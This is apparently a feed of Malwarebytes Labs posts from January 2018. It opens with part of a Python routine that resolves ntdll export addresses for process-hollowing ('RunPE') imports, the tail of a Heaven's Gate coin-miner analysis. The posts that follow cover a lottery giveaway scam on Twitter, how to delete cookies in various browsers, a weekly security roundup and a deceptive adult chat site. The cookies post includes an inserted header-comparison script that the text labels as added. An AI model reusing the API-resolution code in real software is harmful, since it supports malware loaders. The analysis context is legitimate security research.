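    """Return absolute addresses for the wanted names, failing loudly on a miss."""
    exports = parse_exports(image)
    missing = [n for n in wanted if n not in exports]
    if missing:
        raise KeyError(f"not exported: {missing}")
    return {n: base + exports[n] for n in wanted}


def build_image(names, rvas) -> bytes:
    """Build a minimal, constructed PE32+ image that carries only an export directory."""
    img = bytearray(0x1000)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)                  # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    # COFF header: Machine=x64, 0 sections, SizeOfOptionalHeader=240, DLL characteristics
    struct.pack_into("<HHIIIHH", img, 0x84, 0x8664, 0, 0, 0, 0, 240, 0x2022)
    opt = 0x98
    struct.pack_into("<H", img, opt, 0x20B)                  # PE32+ magic
    struct.pack_into("<I", img, opt + 0x6C, 16)              # NumberOfRvaAndSizes
    struct.pack_into("<II", img, opt + 0x70, 0x200, 0x100)   # export directory RVA/size
    funcs, names_tbl, ords = 0x300, 0x340, 0x380
    struct.pack_into("<IIIII", img, 0x200 + 0x14, len(names), len(names), funcs, names_tbl, ords)
    cursor = 0x400
    for i, (name, rva) in enumerate(zip(names, rvas)):
        struct.pack_into("<I", img, funcs + 4 * i, rva)
        struct.pack_into("<I", img, names_tbl + 4 * i, cursor)
        struct.pack_into("<H", img, ords + 2 * i, i)
        img[cursor:cursor + len(name) + 1] = name.encode("ascii") + b"\0"
        cursor += len(name) + 1
    return bytes(img)


def demo() -> dict:
    names = sorted(RUNPE_IMPORTS + ["NtClose"])            # export names are sorted in real DLLs
    rvas = [0x1000 + 0x40 * i for i in range(len(names))]  # constructed RVAs
    return resolve(build_image(names, rvas), NTDLL_BASE, RUNPE_IMPORTS)


if __name__ == "__main__":
    assert is_ntdll_name("NTDLL.DLL".encode("utf-16-le"))
    for name, addr in demo().items():
        print(f"{name:<24} {addr:#018x}")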


So far, the authors of coin miners have not shown a lot of creativity. They achieve their goals by relying heavily on open-source components. The described case also shows this tendency: they made use of a ready-made implementation.

The Heaven’s Gate technique has been around for several years. Some malware uses it for the purpose of staying stealthy. But in the case of this coin miner, the authors probably aimed to maximize performance by using the payload version that best fits the target architecture.

The post A coin miner with a “Heaven’s Gate” appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Be wary of Mega Millions winner “giveaway” on social media

Malwarebytes - Tue, 01/16/2018 - 18:12

I don’t do lotteries, but if I did, I’d probably never, ever win in a million years. That’s not a problem faced by 20-year-old Shane Missler, winner of the fourth-largest haul in Mega Millions’ 21 years of handing out large bundles of cash.

He’s on record as saying he wants to “do some good” for humanity, but I suspect he may have to do some good in the identification verification sweepstakes first.

An account has popped up on Twitter claiming to be him, and claiming he’ll be giving away large amounts of money for retweets. I mean, it’s not exactly donating a million to medical science, but it’s definitely going to help random recipients.

Only problem is, the account seems a little too good to be true. In fact, it’s just one of many currently being retweeted into the stratosphere:


Shall we take a look?


First off: the bio.

Lottery winner of $451 Million. Giving back $5,000 to the first 50k followers that retweet **SIGN UP AND PURCHASE IN LINK BELOW FOR AN INSTANT $2,000**

Well, that’s interesting. You have to “sign up” AND “purchase” via a link to receive $2,000?

The link in question is an Amazon referral link, and for some reason our very rich lottery winner wants you to purchase an Amazon Fire Stick. If you won $451m, would you be bothering with Amazon referral sales, which generate tiny amounts of money for the Amazon associate, before handing over $2,000? What’s the point?


Even better is the claim that $5,000 will be winging its way to 50k followers who retweet the original post. From the BBC article:

He opted to receive a one-time payment of $282m, instead of the full amount over a longer period of time.

Uh oh.

$5,000 x 50,000 is $250m, and according to this article, after you account for taxes he’ll likely be left with around $211m.

So there’s that, plus the apparent ability to keep giving people $2,000 from a bottomless well of cash for every Amazon stick purchased…somehow.

I don’t know about you, but I think I’ll pass on retweeting this and/or going on an Amazon spree, because there’s no way this guy is planning on re-enacting Catch Me If You Can immediately after scoring the cash windfall of his dreams. It just doesn’t make any sense.

A number of similar accounts are also doing the rounds, all of which are claiming much the same things (along with the claim that his account is being “verified soon”).

I can tell you now, there’s no way anyone can confidently predict their Twitter account will be verified, much less when. After the application is sent off to the verification team, you could be verified the next day, week, month, or never. It’s simply not something you can claim is going to happen, because no timescales are given to applicants by Twitter. Also of note: the above account retweeted the below tweet to make it look as though money was indeed being fired off to people:


Some problems with this: neither account is verified. All of these people could be real or playing along or the same individual. Worse, all of the accounts claim the $5,000 will be sent to the “first 50k followers that retweet my pinned tweet.”

Great, except look at the retweet numbers at time of writing:

…and the follower count?

Why has someone been sent money already? Looking at all of the evidence on offer, we feel it’s better to take the stance that without verification this is very, very likely to be a scam. Whatever the winner has planned for his money—and it seems most of what he’s said involves treating his family—there’s a good chance it doesn’t involve giving away all (or, hilariously, more than all) of his recently received winnings. Some of the other accounts floating around don’t even spell his name correctly.

Sorry, Twitter. This isn’t the golden ticket you’re looking for.

The post Be wary of Mega Millions winner “giveaway” on social media appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cookies: Should I worry about them?

Malwarebytes - Mon, 01/15/2018 - 18:16

Starting off the new year, many of us are worried about cookies—how many we ate over the holidays and how we’re going to avoid them in the break room, for example. With so much cybercrime and data theft swirling around like daily bomb cyclones, there’s more than a few folks worried about the kinds of cookies they encounter on the Internet.

But should they be?

Cookies are typically text files that can provide information about your browsing behavior to websites that you visit. On the one hand, cookies are useful for making your Internet experience more efficient. It’s how you automatically get logged in on sites you’ve already visited, even if you closed the browser tab, for example. But on the other hand, cookies are part of the advertising ecosystem that knows which advertisements are most likely to draw your attention—and they serve them up to you wherever you visit.

Why doesn’t Malwarebytes detect cookies?

Cookies in themselves are harmless. They are just data stored by a website in your browser, and they are not malware. It is what sites do with them that determines whether we like them or not. Some cookies are essential to use a site properly, and others might be considered a privacy risk. Since the possible preferences are various and personal, we believe in leaving the choice up to our customers. Of course, we can and do block sites that we know to plant overly intrusive cookies on a user’s machine. But otherwise, we leave it up to you.

How do I delete and control cookies?

At some point, you may want to remove the cookies from your browser. Below, you will see how to do that for a couple of popular browsers. But before you get rid of all of them, let me warn you that you may regret doing so. Your favorite sites will forget who you are, and you will have to log in where you normally were automatically accepted.



Microsoft Edge

Unfortunately, Edge (like Internet Explorer) does not have a built-in tool for managing individual cookies. It only has an all-or-nothing delete option, which you can find under Settings. Under Clear Browsing Data, click Choose > Cookies and saved website data. Cookie control is also not very granular. You can find it under Settings > Advanced settings > View advanced settings. You will find three options: block, don’t block, or block only third-party cookies.

Internet Explorer

To clear cookies in Internet Explorer, select Tools > Internet options > General tab. Under Browsing history, hit Delete and put a checkmark in the Cookies box. Think once more, because this is an all or nothing method, before you hit Delete. For a more detailed description, check out Microsoft’s support article on How to delete cookie files in Internet Explorer.


Google Chrome

Go to Menu > Settings > Show advanced settings. Under Privacy, click Content settings > Cookies. Click “All cookies and site data” to get an overview. Here you do have a choice on what to delete. You can delete individual cookies separately or all of them in one sweep. For a more detailed description, see Google’s support article: Manage your cookies and site data.


Mozilla Firefox

Click on the Firefox button > Options > Privacy > Show Cookies. Here you will see options to Delete all cookies or search for specific ones you want to delete. For a more detailed description, take a look at Firefox’s article: Delete cookies to remove the information websites have stored on your computer.


Opera

Click the Opera button > Settings > Delete Private Data > Detailed options > Manage cookies. Here you will see an overview of the stored cookies and an option to delete them separately. For more information, see Opera’s help article: Manage Cookies.

In the links I have provided for Chrome, Firefox, and Opera, you will also find information on how to control which cookies get stored on your computer. Internet Explorer has the controls on the Privacy tab under Tools > Internet options.


Mac

Malwarebytes for Mac does not detect or remove cookies either. As we said before, cookies are just data stored by a website, and not malware. At worst, they can pose a threat to your privacy, in the case of tracking cookies. Further, many cookies are not only legitimate, but also required for the normal operation of some websites.

If you feel it necessary to delete cookies from your computer, some of them may be difficult to get rid of. You can use the following techniques to delete these cookies, but you should be aware that they will come right back as soon as you visit a site that sets those cookies.


Safari

Safari offers the option to clear all your cookies along with your browsing history. To use this option, choose History > Clear History. Click the pop-up menu, and then choose how far back you want your browsing history cleared. Or you can choose to delete only cookies and website data by clicking Preferences > Privacy > Manage Website Data. Select one or more websites, then click Remove or Remove All. For more information, see Safari’s support articles: Manage cookies and website data and Safari help.

Under Privacy, you can also find the settings to control which cookies will be allowed moving forward by choosing “Change which cookies and website data are accepted.”

Adobe Flash Player

When you visit some sites with Adobe Flash Player installed and activated, the software also stores cookie data on your system. The easiest way to control these is to visit the Flash Player Help site and use the Website Storage Settings panel displayed there to delete those that you no longer want. Read the information below the panel to make sure you understand what your options are and how to use them.


Microsoft Silverlight

The Silverlight browser plug-in can also store cross-browser information in its application cache. To delete the Silverlight cache, follow this procedure:

  • Close all Microsoft browser windows (Internet Explorer and Edge).
  • Click Start > All Programs > Microsoft Silverlight.
  • Choose the Application Storage tab.
  • Click Delete all.
  • Click “Yes” in the “Delete application storage for all Web sites?” dialog.
  • Click OK.

Evercookies

Evercookies are not just text files. They are JavaScript routines that recreate cookies even after they have been removed. Evercookies often rely on the two major streaming video browser plug-ins, Microsoft Silverlight and Adobe Flash. These plug-ins have their own caching and storage, which can be used across sessions and even across browsers. But the data can be hidden in other caches as well. By storing the same data in several locations that a client can access, the data can be recovered, and then rewritten and reused, if any of it is ever lost (for example, by clearing cookies).

To actually get rid of evercookies, you would have to delete all the related cookies and clear all the caches of all your browsers and video browser plug-ins, using the information posted above.


Supercookies

These are technically not cookies, because they are not stored in browsers or browser plug-ins, but I wanted to mention them here anyway because their name might lead you to think otherwise. Supercookies are unique identifiers that are inserted into the HTTP headers by a service provider. Service providers are legally bound to offer you an opt-out option, so it could be prudent to check whether your service provider uses supercookies and how to opt out if they do.
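One practical way to check for the header injection described above is to send a plain HTTP request to an echo endpoint you control and compare what you sent with what arrived. The following Python example is added here and is not part of the original post. It works entirely offline on two constructed raw requests: the header name X-Example-Subscriber-Id, its value, and the host names are made up for the demo, and the Via header stands in for the ordinary proxy edits a carrier network also makes.

```python
# Constructed sample traffic: the request as the client sent it, and the same
# request as an echo endpoint under your control received it.
SENT_REQUEST = (
    "GET /echo HTTP/1.1\r\n"
    "Host: echo.example\r\n"
    "User-Agent: Mozilla/5.0 (demo)\r\n"
    "Accept: text/html\r\n"
    "\r\n"
)
RECEIVED_REQUEST = (
    "GET /echo HTTP/1.1\r\n"
    "Host: echo.example\r\n"
    "User-Agent: Mozilla/5.0 (demo)\r\n"
    "Accept: text/html\r\n"
    "X-Example-Subscriber-Id: 9f3c1a7e2b\r\n"   # constructed injected identifier
    "Via: 1.1 carrier-proxy.example\r\n"        # constructed proxy trace header
    "\r\n"
)


def parse_headers(raw_request: str) -> dict:
    """Return the request headers as a {lowercase-name: value} dict."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def compare_requests(sent_raw: str, received_raw: str) -> dict:
    """Classify what the echo endpoint saw relative to what the client sent:
    'added'   = headers the client never sent (the supercookie pattern),
    'changed' = headers the client sent whose value differs on arrival."""
    sent, received = parse_headers(sent_raw), parse_headers(received_raw)
    added = {k: v for k, v in received.items() if k not in sent}
    changed = {k: (sent[k], v) for k, v in received.items()
               if k in sent and sent[k] != v}
    return {"added": added, "changed": changed}


if __name__ == "__main__":
    result = compare_requests(SENT_REQUEST, RECEIVED_REQUEST)
    for name, value in result["added"].items():
        print(f"header added in transit: {name}: {value}")
    for name, (before, after) in result["changed"].items():
        print(f"header changed in transit: {name}: {before!r} -> {after!r}")
```

The comparison is only meaningful over plain http://: an intermediary cannot add headers inside a TLS connection, so a test over https:// will always come back clean even on a network that injects identifiers.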

The post Cookies: Should I worry about them? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (January 8 – January 14)

Malwarebytes - Mon, 01/15/2018 - 17:00

It’s very early in the year, yet everyone has already had a complete meltdown (pun intended) over a number of serious vulnerabilities found in legacy and modern microprocessors. Last week, rightly so, vendors released patches for hardware and OSes to help mitigate these threats. However, problems in patching persisted.

As if this wasn’t challenging enough, some online criminals jumped on the bandwagon and took advantage of the hullabaloo to push the Smoke Loader malware onto unsuspecting users’ systems.

On our blog, we also touched on WPA3, misleading marketing tactics, more 419 scams, and the indictment of the alleged Fruitfly creator—a win for the security community.

Lastly, in the realm of cryptocurrency, we saw an increase in malware payloads from the RIG exploit kit.

Other news

Stay safe, everyone!

The post A week in security (January 8 – January 14) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Stripchat bot spells block

Malwarebytes - Fri, 01/12/2018 - 23:26

Here at Malwarebytes, we spend a lot of time and effort scouring the Internet for malicious websites that we can protect our users from. Sometimes these websites push malware or some kind of scam. Other times it comes down to bad advertising practices that are used to fool the user into clicking on something.

We used to see a lot of this kind of trick with fake download buttons that redirected users to sites offering installer downloads or surveys. More recently, we found a site using a different type of deception, and it has shot up to our second-most common detection over the last month. The site, Stripchat, is an online streaming video service operated by Technius LTD and offered on a number of popular websites. The streaming service targets adult audiences for the purposes of online sexual encounters. The service boasts many active subscribers and a number of channels available for use.


Stripchat has a number of valid channels, feeds, and websites, but one particular subdomain has caught the attention of Malwarebytes for implementing various deceptive tactics and misleading techniques. This subdomain is used for advertising purposes. Once opened in a web browser, the website purports to engage the user via a “live” chat window and the ability to chat with a model. This, however, is not the case.

The reported live video feed is nothing more than a video retrieved from the Internet and subsequently looped, or in some cases terminated with a message indicating that the model is in a private chat. These messages are deceptive: the feeds are not live, as claimed, and the responses are pre-programmed, as can be seen from the JavaScript code and the subsequent chat session.

Malwarebytes blocks the sub-domain for the use of these misleading marketing tactics.

However, if you’d like to continue visiting this sub-domain, you can add an exception. Scroll down to the “How to add an exception” heading of this post on why we block CoinHive to learn how.

The post Stripchat bot spells block appeared first on Malwarebytes Labs.

Categories: Techie Feeds

